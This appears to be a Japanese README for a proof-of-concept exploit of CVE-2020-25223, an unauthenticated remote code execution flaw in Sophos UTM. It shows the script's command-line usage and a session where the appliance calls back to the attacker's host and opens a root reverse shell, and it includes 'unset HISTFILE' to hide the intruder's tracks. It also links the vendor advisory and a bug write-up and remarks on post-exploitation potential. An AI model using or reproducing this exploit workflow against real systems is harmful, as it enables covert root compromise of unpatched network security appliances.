
CVE-2020-25223
CVE-2020-25223 RCE PoC、認証不要でリバースシェルを取得します。いくつかの脅威磁石を統合する必要があったため、これを迅速に実装しました。
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
#
これは実装されていません。nucleiテンプレートを使用してください。
これらにはPythonインタプリタがあり、実際には非常に充実したLinux環境が利用可能です。ポストエクスプロイテーションの可能性は素晴らしいです。
関心のある誰かがこの部分を埋めてくれると思います。Bitter(「ブルーチームTwitter」のサブセット)がおそらくすぐにやってくれるでしょう。つまり、暗号化されていないリバースシェルがUnified Threat Managerボックスからビーコンを送信しているのを検出するのはそれほど難しいことではないでしょう?
誰か(おそらくSophos社から)がこれを送ってきました。公式の修正リンクです。UTMを更新してください。https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
サードパーティの参考文献(バグ詳細):https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
Sophos社に直接苦情を送ってください。21世紀になってまでPerlのopen()にユーザー入力を渡すことが良いアイデアだと考えたようです。